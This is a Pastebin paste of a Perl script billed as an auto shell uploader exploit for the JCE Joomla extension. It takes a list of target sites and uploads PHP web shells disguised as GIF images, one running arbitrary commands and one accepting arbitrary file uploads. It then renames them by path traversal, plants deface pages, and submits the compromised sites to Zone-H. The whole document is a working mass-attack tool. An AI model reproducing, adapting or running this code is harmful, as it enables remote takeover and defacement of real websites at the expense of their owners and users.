Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl -W
- use Socket;
- use IO::Socket;
- use IO::Socket::INET;
- use LWP::UserAgent;
- use HTTP::Request::Common qw(POST);
- use HTTP::Request::Common qw(GET);
- $ag = LWP::UserAgent->new();
- $ag->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
- $ag->timeout(10);
- #Recodado por No\One
- #print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";
- #print "\t|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) ||||\n\n";
- if($0 =~ /^(.*)\\(.+)$/){chomp($a = $2);}else{chomp($a = $0);}
- if(!defined($ARGV[0])) { print "\n * Modo de usar => $a lista.txt ou $a -s www.site.com.br \n"; exit; }
- $TXT = $ARGV[0]; if($TXT eq "-s"){@TXT = $ARGV[1]; $aq = $ARGV[1];
- if(!defined($ARGV[1])) { print "\n\n * Modo de usar => $a lista.txt ou $a -s www.site.com\n\n"; exit; }
- }else{open(TXT,"<$TXT"); chomp(@TXT=<TXT>); close(TXT); $aq = $ARGV[0];}
- $tx = $#TXT+1;
- print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.2 .::.\n\n";
- $ok = '0'; $erro = '0';
- site: foreach(@TXT){ chomp(my $site = $_);
- $cm=''; $porra = '0';
- if($site =~ /http:\/\/(.*)\/(.*)\//){$site = $1; $cm = $2;
- }elsif($site =~ /http:\/\/(.*)\/(.*)/){$site = $1; $cm = $2;
- }elsif($site =~ /https:\/\/(.*)\/(.*)\//){$site = $1; $cm = $2;
- }elsif($site =~ /https:\/\/(.*)\/(.*)/){$site = $1; $cm = $2;
- }elsif($site =~ /http:\/\/(.*)\//){$site = $1;
- }elsif($site =~ /http:\/\/(.*)/){$site = $1;
- }elsif($site =~ /https:\/\/(.*)\//){$site = $1;
- }elsif($site =~ /https:\/\/(.*)/){$site = $1;
- }elsif($site =~ /(.*)\/(.*)\//){$site = $1; $cm = $2;
- }elsif($site =~ /(.*)\/(.*)/){$site = $1; $cm = $2;
- }elsif($site =~ /(.*)\//){$site = $1;}
- $http = 'http://'; $porta = "80";
- $script = '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20';
- $up = '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b';
- print "\n>> $site ->";
- $cs++;
- system "title $a $aq - [ $cs\/$tx ] =-= Zone-H [ OK ($ok) ~ ERRO ($erro) ]";
- ############################################### Packet 1 --> checking misses
- if($cm){ $script = '/'."$cm"."$script"; $up = '/'."$cm"."$up"; }
- $pageURL= "$http"."$site"."$script";
- $getp = $ag->request(HTTP::Request->new(GET => $pageURL));
- $get = $getp->content;
- if($get !~ m/multipart\/form-data|hastip|\/plugins\/editors\/jce\//g){ print " [!]"; next site;}
- my @index = (
- '../../xk.txt',
- '../../xh.txt',
- '../../ck.htm',
- '../../tmp/x.html',
- '../../cache/x.html',
- '../x.html',
- '../../tmp/ck.htm',
- '../../cache/ck.htm',
- '../ck.htm',
- '../xxx.php',
- '../xxu.php');
- if($cm){push(@index,'../../../x.htm','../../../x.html','../../../x.php','../../../xk.txt','../../../xh.txt','../../../ck.htm');}
- push(@index,'../../x.php','../../x.php');
- foreach(@index){
- chomp(my $indx = $_);
- $porra++;
- if($indx =~ /xk/){ $narq = 'arti'."$porra";
- $cont = 'Invasão feita por Renatinho';}
- if($indx =~ /xh/){ $narq = 'not'."$porra";
- $cont = 'Invasão feita por Renatinho';}
- if($indx =~ /configuration/){ $narq = 'clor'."$porra";
- $cont = 'Invasão feita por Renatinho<?php exit;?>';}
- if($indx =~ /index|ck/){ $narq = 'plas'."$porra";
- $cont = 'Invasão feita por Renatinho';}
- if($indx =~ /xxx/){ $narq = 'gligie'."$porra";
- $cont = 'GIF89a
- <?php system("$_GET[cmd]"); exit; ?>';}
- if($indx =~ /xxu/){ $narq = 'tir'."$porra";
- $cont = 'GIF89a u
- <?php @copy($_FILES[file][tmp_name], $_FILES[file][name]); exit; ?>';}
- #print "\n\n $indx - $narq \n$cont \n\n----------------------------------------------";
- ############################################### Packet 2 --> Leveling as a. Gif
- $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$site" ,PeerPort=>"$porta", Timeout=>"10") or " Erro!" and next site;
- print $remote "POST $up HTTP/1.1"."\n";
- print $remote "Host: $site"."\n";
- print $remote "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801"."\n";
- print $remote "Content-Type: multipart/form-data; boundary=---------------------------41184676334"."\n";
- print $remote "Content-Length: 769"."\n\n";
- print $remote "-----------------------------41184676334"."\n";
- print $remote 'Content-Disposition: form-data; name="upload-dir"'."\n\n";
- print $remote '/'."\n";
- print $remote "-----------------------------41184676334"."\n";
- print $remote 'Content-Disposition: form-data; name="Filedata"; filename=""'."\n";
- print $remote 'Content-Type: application/octet-stream'."\n\n\n";
- print $remote "-----------------------------41184676334"."\n";
- print $remote 'Content-Disposition: form-data; name="upload-overwrite"'."\n\n";
- print $remote "0"."\n";
- print $remote "-----------------------------41184676334"."\n";
- print $remote 'Content-Disposition: form-data; name="Filedata"; filename="'.$narq.'.gif"'."\n";
- print $remote 'Content-Type: image/gif'."\n\n";
- print $remote "$cont"."\n";
- print $remote "-----------------------------41184676334"."\n";
- print $remote 'Content-Disposition: form-data; name="upload-name"'."\n\n";
- print $remote "$narq"."\n";
- print $remote "-----------------------------41184676334"."\n";
- print $remote 'Content-Disposition: form-data; name="action"'."\n\n";
- print $remote 'upload'."\n";
- print $remote "-----------------------------41184676334--"."\n\n";
- close($remote);
- ############################################### Packet 3 --> Changing name of estenxão. Gif to. Php
- $remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site" ,PeerPort=>"$porta", Timeout=>"10") or " Erro!" and next site;
- $json = 'json={"fn":"folderRename","args":["'.$narq.'.gif","'.$indx.'"]}';
- print $remote "POST $script HTTP/1.1"."\n";
- print $remote "Host: $site"."\n";
- print $remote "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801"."\n";
- print $remote 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'."\n";
- print $remote 'X-Request: JSON'."\n";
- print $remote "Content-Length: ".length($json).""."\n\n";
- print $remote "$json"."\n\n";
- #while(<$remote>){print "$_";}
- close($remote);
- }
- ############################################### Packet 4 --> Checando resultado do upload
- my @xxx=('/images/xxu.php','/images/xxx.php');
- if($cm){ push(@xxx,'/'."$cm".'/images/xxu.php','/'."$cm".'/images/xxx.php'); }
- foreach(@xxx){
- $shc = 'http://'."$site"."$_";
- my $resc=$ag->request(HTTP::Request->new(GET => $shc));
- $respc = $resc->content;
- if($respc =~ m/GIF89a/g){ open(SHU,">>SH.txt"); print SHU "$shc\n"; close(SHU); } }
- my @indxs = ('/','/ck.htm','/xk.txt','/xh.txt','/tmp/','/cache/','/images/','/tmp/ck.htm','/cache/ck.htm','/images/ck.htm');
- if($cm){
- push(@indxs,'/'."$cm".'/','/'."$cm".'/ck.htm','/'."$cm".'/xk.txt','/'."$cm".'/xh.txt','/'."$cm".'/tmp/','/'."$cm".'/cache/','/'."$cm".'/images/','/'."$cm".'/tmp/ck.htm','/'."$cm".'/cache/ck.htm','/'."$cm".'/images/ck.htm')}
- foreach(@indxs){ chomp(my $iind = $_);
- $urst = 'http://'."$site"."$iind";
- my $res=$ag->request(HTTP::Request->new(GET => $urst));
- $resp = $res->content;
- if($resp =~ m/KkK1337/g){ $sthckd = "$site"."$iind";
- $sockz = IO::Socket::INET->new(PeerAddr => "www.zone-h.org", PeerPort => "80", Proto => "tcp") or next;
- print $sockz "POST /notify/single HTTP/1.0\r\n";
- print $sockz "Accept: */*\r\n";
- print $sockz "Referer: http://www.zone-h.org/notify/single\r\n";
- print $sockz "Accept-Language: pt-br\r\n";
- print $sockz "Content-Type: application/x-www-form-urlencoded\r\n";
- print $sockz "Connection: Keep-Alive\r\n";
- print $sockz "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801\r\n";
- print $sockz "Host: www.zone-h.org\r\n";
- $length=length("defacer=KkK1337&domain1=http%3A%2F% 2F$sthckd&hackmode=17&reason=1");
- print $sockz "Content-Length: $length\r\n";
- print $sockz "Pragma: no-cache\r\n";
- print $sockz "\r\n";
- print $sockz "defacer=KkK1337&domain1=http%3A%2F%2F$sthckd&hackmode=17&reason=1\r\n";
- $zn = join('',<$sockz>);
- if($zn =~ m/ERROR:/g){print " [ Zone-H ] ".$http.$sthckd." [ ERRO ]"; $erro++;}else{print " [ Zone-H ] ".$http.$sthckd." [ OK ]"; $ok++;}
- close($sockz);
- open(HCKDS,">>HCKDS.txt"); print HCKDS "$http"."$sthckd\n"; close(HCKDS);
- $sthckd = ''; $hk++; next site;}
- } }
- if(!$hk){$hk=0;}if(!$ok){$ok=0;}if(!$erro){$erro=0;}
- if($hk){
- print "\n\n [ Total Hacked -> $hk -#- Success sended Zone-h -> $ok -#- Error sended to Zone-h -> $erro ]\n\n";}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement